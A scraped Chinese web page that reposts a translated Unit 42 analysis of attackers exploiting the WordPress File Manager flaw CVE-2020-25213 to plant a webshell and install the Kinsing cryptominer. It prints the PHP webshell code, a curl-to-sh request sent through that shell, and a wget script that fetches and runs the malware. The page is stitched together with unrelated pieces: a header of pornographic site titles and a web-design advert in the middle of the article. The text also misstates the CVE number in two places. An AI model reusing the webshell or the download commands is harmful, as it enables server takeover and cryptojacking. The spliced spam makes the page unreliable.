日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側工具欄

新聞中心

這里有您想知道的互聯網營銷解決方案
CVE-2020-25213漏洞在野利用

 2020年12月,Unit 42研究人員發(fā)現有攻擊者嘗試利用WordPress File Manager(文件管理器)插件中的文件上傳漏洞。攻擊者成功利用該漏洞可以以任意文件名和擴展上傳任意文件,引發(fā)目標web 服務器上的遠程代碼執(zhí)行。

創(chuàng)新互聯-專業(yè)網站定制、快速模板網站建設、高性價比府谷網站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式府谷網站制作公司更省心,省錢,快速模板網站建設找我們,業(yè)務覆蓋府谷地區(qū)。費用合理售后完善,十余年實體公司更值得信賴。

攻擊者利用該漏洞利用來安裝webshell,然后該webshell 被用來安裝Kinsing惡意軟件,該惡意軟件會從H2miner 家族運行惡意加密貨幣挖礦機。Kinsing是用Golang編程語言開發(fā)的,最終的目標是用于容器環(huán)境中的加密貨幣劫持攻擊。

CVE-2020-2513和Webshells

CVE-2020-2513漏洞產生的原因是WordPress文件管理器插件將elFinder庫的connector.minimal.php.dist 文件擴展名改成了.php,所以該文件可以直接執(zhí)行。但是因為該文件沒有訪問限制,因此任何瀏覽該web 服務器的用戶都可以執(zhí)行。該文件包含無需認證就上傳文件到web服務器的機制。由于該漏洞,任何人都可以上傳文件,因此惡意攻擊者就利用該機制來上傳webshell,可以用來進行下一步的惡意軟件安裝或加密貨幣挖礦活動。

攻擊鏈

研究人員調查發(fā)現被攻擊的機器中有以下日志信息,其中發(fā)給Web服務器的HTTP POST請求有:

 
 
    
  
  
  1. [19/Dec/2020:08:58:08 +0000] “POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1” 200 1453 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36”
    2.

該請求用來上傳webshell。研究人員進一步分析發(fā)現了惡意webshell:

 
 
    
  
  
  1. [19/Dec/2020:08:57:48 +0000] “GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1” 200 411
    2.

從上圖中可以發(fā)現,該webshell名為k.php,并提供了一個執(zhí)行的命令。該webshell 本身非常簡單,是在web 服務器上明文保存的,并且不含有任何的混淆和認證措施:

 
 
    
  
  
  1. < ?php if(isset($_REQUEST['cmd']){ echo "< pre >"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "< /pre >"; die; }? >
    2.

研究人員進一步分析返回給webshell k.php的HTTP GET請求,發(fā)現該命令調用了下載名為wpf.sh文件的curl 命令,并執(zhí)行該文件。

研究人員從攻擊者的C2 服務器中獲得了該shell腳本,文件內容如下:

 
 
    
  
  
  1. $WGET $DIR/kinsing http://X.X.X.X/kinsing
    2. 
  
  
  2. chmod +x $DIR/kinsing
    3. 
  
  
    4. 
  
  
  4. SKL=wpf $DIR/kinsing
    5. 
  
  
    6.

 wpf.sh文件是一個使用wget下載Kinsing的腳本,給予該腳本執(zhí)行權限,并執(zhí)行。

總結

研究人員發(fā)現了WordPress 文件管理器遠程代碼執(zhí)行漏洞 CVE-2020-25213 的在野利用。攻擊者利用該漏洞利用來安裝Kinsing惡意軟件,運行一個H2miner家族的惡意加密貨幣挖礦機。Kinsing的最終目標是用于容器環(huán)境的加密貨幣劫持攻擊。

本文翻譯自:https://unit42.paloaltonetworks.com/cve-2020-25213/如若轉載,請注明原文地址。


當前文章:CVE-2020-25213漏洞在野利用
文章分享:http://m.5511xx.com/article/dpdhoeh.html